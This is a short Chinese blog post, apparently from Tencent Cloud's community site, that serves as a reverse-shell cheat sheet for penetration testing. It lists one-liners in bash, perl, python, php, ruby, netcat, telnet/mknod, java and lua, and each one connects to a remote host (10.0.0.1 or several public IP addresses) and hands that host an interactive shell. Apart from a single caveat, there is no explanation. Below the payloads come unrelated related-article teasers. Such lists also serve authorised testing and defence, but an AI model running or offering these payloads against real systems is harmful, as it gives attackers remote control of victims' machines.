渗透过程中的端口反弹

反弹的各种姿势。

bash版本:

[sourcecode language="plain"]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1[/sourcecode]

注意这个是由解析shell的bash完成,所以某些情况下不支持

perl版本:

[sourcecode language="plain"]perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'[/sourcecode]

python版本:

[sourcecode language="plain"]python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'[/sourcecode]

php版本:

[sourcecode language="plain"]php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'[/sourcecode]

ruby版本:

[sourcecode language="plain"]ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'[/sourcecode]

nc版本:

[sourcecode language="plain"]nc -e /bin/sh 223.8.200.234 1234[/sourcecode]

nc不使用-e:

[sourcecode language="plain"] mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe [/sourcecode]

mknod:

[sourcecode language="plain"] mknod backpipe p && telnet 173.214.173.151 8080 0backpipe [/sourcecode]

java版本:

[sourcecode language="plain"] r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() [/sourcecode]

lua版本:

[sourcecode language="plain"]lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"[/sourcecode]

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏日暮星辰

phpmyadmin与php.ini中的socket配置问题

昨天在安装完新的perconesql数据后,发现phpmyadmin不能正常连接了。一时查来查去不知出了什么问题。

1224
来自专栏北京马哥教育

Vim自动补全神器:YouCompleteMe

第一次听说这个插件还是在偶然的情况下看到别人的博客,听说了这个插件的大名。本来打算在实训期间来完成安装的,无奈网实在不给力,也就拖到了回家的时候。在开始准备工作...

6546
来自专栏木制robot技术杂谈

Hexo搭建个人博客(三)—— Hexo博客的美化

通过前两节的学习,我们已经搭建好自己的博客,就像盖房子一样要对内部进行装修,也就是对博客进行美化。 ---- 安装Hexo博客主题 Hexo博客可以安装不同的...

1.3K9
来自专栏JetpropelledSnake

SNMP学习笔记之SNMP报文以及不同版本(SNMPv1、v2c、v3)的区别

本篇文章将重点分析SNMP报文,并对不同版本(SNMPv1、v2c、v3)进行区别!

2891
来自专栏Android 研究

APK安装流程详解13——PMS中的新安装流程下(装载)

而在handleReturnCode()方法里面也是调用processPendingInstall(args, ret)方法,如下:

2132
来自专栏Kubernetes

Kubernetes如何通过Devi

Device Plugins Device Pulgins在Kubernetes 1.10中是beta特性,开始于Kubernetes 1.8,用来给第三方设备...

4868
来自专栏高性能服务器开发

+从零实现一款12306刷票软件1.4

这里还有个注意细节,就是通过POST请求发送的数据需要对一些符号做URL Encode,这个我在上一篇文章《从零实现一个http服务器》也详细做了介绍,还不清楚...

2212
来自专栏拂晓风起

Fiddler 修改返回内容 OnBeforeResponse 无效 没用

1855
来自专栏PHP实战技术

ThinkPHP->pathinfo模式(Linux下nginx的配置说明)

小伙伴在使用ThinkPHP搭建自己或者公司项目的时候,url模式设置成为兼容模式,也就是URL_MODEL的值为3的时候是不是也遇到过Lnmp的环境不支持pa...

27110
来自专栏Kubernetes

深入分析Kubernetes Scheduler的优先级队列

从1.9版本开始,Kubernetes实现了基于Pod优先级的调度队列,一方面提供高优先级的Pod优先被调度的能力,另一方面减轻抢占式调度时潜在的High Pr...

7487

扫码关注云+社区

领取腾讯云代金券